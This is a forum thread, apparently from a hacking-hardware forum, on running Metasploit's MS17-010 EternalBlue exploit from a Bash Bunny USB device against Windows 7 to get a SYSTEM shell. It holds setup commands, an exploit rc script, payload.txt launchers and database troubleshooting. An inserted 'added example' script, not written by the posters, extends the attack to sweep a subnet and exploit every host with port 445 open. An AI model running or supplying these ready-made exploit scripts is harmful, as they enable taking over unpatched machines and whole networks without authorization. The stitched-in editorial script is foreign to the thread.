hanshaze Posted September 25, 2017

My latest BashBunny challenge: MSF - MS17_010 - BashBunny. Thanks to Astr0baby, I am just a sharer of his excellent thoughts. Let's go.

Make sure to set some date for TLS/SSL to work ;)

# date -s "20170925"

Add this to /etc/apt/sources.list:

deb http://http.us.debian.org/debian/ jessie-updates main

# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev
# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.4.1
# vi /root/.bashrc

Add at the end:

source /etc/profile.d/rvm.sh
rvm use 2.4.1 --default

# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh
# ./msf_vps_installer.sh
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

Check /etc/dhcp/dhcpd.conf. The range

range 172.16.64.10 172.16.64.12;

should be set to only one value:

range 172.16.64.64 172.16.64.64;

Save this to ~/metasploit-framework as cmd.rc:
-----
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit
-----

The above is ideal when we want to get an NT AUTHORITY\SYSTEM shell on the target Windows 7 SP1 x64 (unlocked). If the target is locked we can use another payload such as this one. So RHOST would again be 172.16.64.64 and LHOST 172.16.64.1 …

This can be easily scripted via a Metasploit RC script, so ;) The Metasploit RC scripts should be placed in /root/metasploit-framework on the Bash Bunny so we can call them from the payload.txt for the corresponding attack switch position. So ideally this would look like this (switch1 or switch2):

payload.txt
-----
#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set some current time ..... check your watch
date -s "20170523 23:23"
# Load the RVM Ruby that msfconsole needs; a payload shell does not read .bashrc
source /etc/profile.d/rvm.sh
LED ATTACK
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/cmd.rc &
LED FINISH
-----

The target Windows 7 should have SMB port 445 accessible from the USB network that the Bash Bunny device creates. A default Windows system has the firewall on, so the attack won't work as the port is blocked. For demonstration purposes we assume there is no firewall. After a while you should get an NT AUTHORITY\SYSTEM cmd shell popping up on your Win 7 desktop :)
i8igmac Posted September 25, 2017

Perform an nmap scan in Metasploit. On the subnet, discover all devices on port 445, then use the Metasploit database to launch the attack on all devices discovered. I made some assumptions on your scenario.
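The following is an added example, not code from either post above: a payload.txt-style launcher in bash that combines hanshaze's single-lease setup with i8igmac's suggestion of sweeping the subnet for port 445 and attacking everything the Metasploit database finds. It adds two things a practitioner would want on the Bunny: it waits for the target to actually expose TCP/445 before spending time on msfconsole startup (the firewall caveat in the first post), and it redirects msfconsole output to a log on the udisk so a run that dies can be debugged. The rc filename, the log path, the subnet, the WAIT_SECS timeout and the "sweep" mode are assumptions; the sweep mode needs msfconsole to be connected to its PostgreSQL database, and it sets RHOSTS, which current Metasploit accepts where the 2017 module used RHOST.

```shell
#!/bin/bash
# Added example (not from the original posts): Bash Bunny launcher for the
# MS17-010 scenario. Only LED/ATTACKMODE are Bunny specific; write_rc and
# wait_for_port can be sourced and exercised on any Linux box.

MSF_DIR=/root/metasploit-framework
RC_FILE="$MSF_DIR/eternal-cmd.rc"     # assumed rc filename
LOG=/root/udisk/loot/ms17_010.log     # assumed log location on the Bunny's udisk
TARGET=172.16.64.64                   # the single DHCP lease from the post
SUBNET=172.16.64.0/24                 # assumed subnet for sweep mode
WAIT_SECS=60                          # assumed: how long to wait for TCP/445

# write_rc MODE RC_PATH
#   single : exploit the one lease, exactly as the post's cmd.rc does
#   sweep  : db_nmap the subnet for open 445, load every hit from the msf
#            database into RHOSTS (services -R), then exploit them all
write_rc() {
    local mode="$1" out="$2"
    {
        echo "use exploit/windows/smb/ms17_010_eternalblue"
        echo "set PAYLOAD windows/x64/exec"
        echo "set CMD cmd.exe"
        if [ "$mode" = sweep ]; then
            echo "db_nmap -p 445 --open $SUBNET"
            echo "services -p 445 -u -R"
        else
            echo "set RHOSTS $TARGET"
        fi
        echo "exploit"
    } > "$out"
}

# wait_for_port HOST PORT SECS: return 0 as soon as a TCP connect succeeds,
# 1 if SECS seconds pass without one. Uses bash's /dev/tcp, so no nc needed.
wait_for_port() {
    local host="$1" port="$2" secs="$3" i=0
    while [ "$i" -lt "$secs" ]; do
        if timeout 1 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
            return 0
        fi
        i=$((i + 1))
        sleep 1
    done
    return 1
}

bunny_main() {
    local mode="${1:-single}"
    LED SETUP
    ATTACKMODE RNDIS_ETHERNET
    date -s "20170925 12:00"          # assumed; check your watch, TLS needs it
    # a payload shell does not read .bashrc, so load RVM's Ruby explicitly
    . /etc/profile.d/rvm.sh
    mkdir -p "$(dirname "$LOG")"
    write_rc "$mode" "$RC_FILE"
    # in single mode, do not start msfconsole against a host that firewalls 445
    if [ "$mode" = single ] && ! wait_for_port "$TARGET" 445 "$WAIT_SECS"; then
        echo "$(date) no TCP/445 on $TARGET after ${WAIT_SECS}s" >> "$LOG"
        LED FAIL
        return 1
    fi
    LED ATTACK
    "$MSF_DIR/msfconsole" -q -r "$RC_FILE" >> "$LOG" 2>&1 &
    LED FINISH
}

# Run the attack flow only on the Bunny itself, where ATTACKMODE exists.
if command -v ATTACKMODE >/dev/null 2>&1; then
    bunny_main "${1:-single}"
fi
```

Put this in the switch directory as payload.txt for single-target use, or call bunny_main sweep from the bottom of the file for the subnet variant; the log under /root/udisk/loot is readable from the host afterwards, which is the quickest way to see why msfconsole exited.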
v0dka Posted December 24, 2017

Hello, I met a problem: I wrote a payload.txt as you told, but it didn't run Metasploit at all. So I added "source /etc/profile.d/rvm.sh" to the payload. Msf will run for a moment as follows:

root@bunny:~# ps -aux | grep 'metasploit'
root       920 33.4  8.3  57556 42496 ?        Sl   13:18   0:10 ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc
root      1115  0.0  0.1   2072   544 pts/0    S+   13:19   0:00 grep metasploit
root@bunny:~#

But it will stop after that:

root@bunny:~# ps -aux | grep 'metasploit'
root      1220  0.0  0.1   2068   544 pts/0    S+   13:19   0:00 grep metasploit

No payload will execute. I tried to debug it with the command:

ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc >> /root/udisk/exp/msf.log

But the file is empty. This command will work if I execute it over Bash Bunny SSH. The payload also worked if I replaced it with another command. So I don't know why it doesn't work. Thanks in advance.
b0N3z Posted December 25, 2017

I've noticed the last Metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure Metasploit is connected to a database, which you can make by downloading the msfdb script from GitHub; give it a quick edit for the bunny and execute. Worked great for me.
thatalbinofrog Posted January 28, 2019

On 12/26/2017 at 5:23 AM, b0N3z said:
I've noticed the last Metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure Metasploit is connected to a database, which you can make by downloading the msfdb script from GitHub; give it a quick edit for the bunny and execute. Worked great for me.

I've got this 90% up and running, but can't get Metasploit to connect to the PostgreSQL database. Can you please explain how to do this step in further detail? Thanks!
Just_a_User Posted January 28, 2019

1 hour ago, thatalbinofrog said:
Can you please explain how to do this step in further detail?

In the past I had issues with this and this guy helped me with this command
thatalbinofrog Posted January 29, 2019

11 hours ago, Just_a_User said:
In the past I had issues with this and this guy helped me with this command

Thanks for the reply, but that command didn't help. My database.yml file would not generate; do you know how to fix this?
b0N3z Posted January 31, 2019

@thatalbinofrog I looked up how to make a Metasploit database and tried a couple of different things till I got it. I can't quite remember how I did it though.
PoSHMagiC0de Posted February 1, 2019

Hmm, so I have a thought. Since this is only for one payload, why not try just using the module for EternalBlue and the user's custom shellcode to execute code? The Bunny setup would be easier and the spin-up would be a lot faster and less extensive for the Bash Bunny.
hanshaze (Author) Posted January 1, 2020

On 1/28/2019 at 3:53 PM, thatalbinofrog said:
I've got this 90% up and running, but can't get Metasploit to connect to the PostgreSQL database. Can you please explain how to do this step in further detail? Thanks!

sudo /etc/init.d/postgresql start && sudo msfdb init
# or
sudo systemctl daemon-reload && sudo pg_ctlcluster 12 main start
Archived
This topic is now archived and is closed to further replies.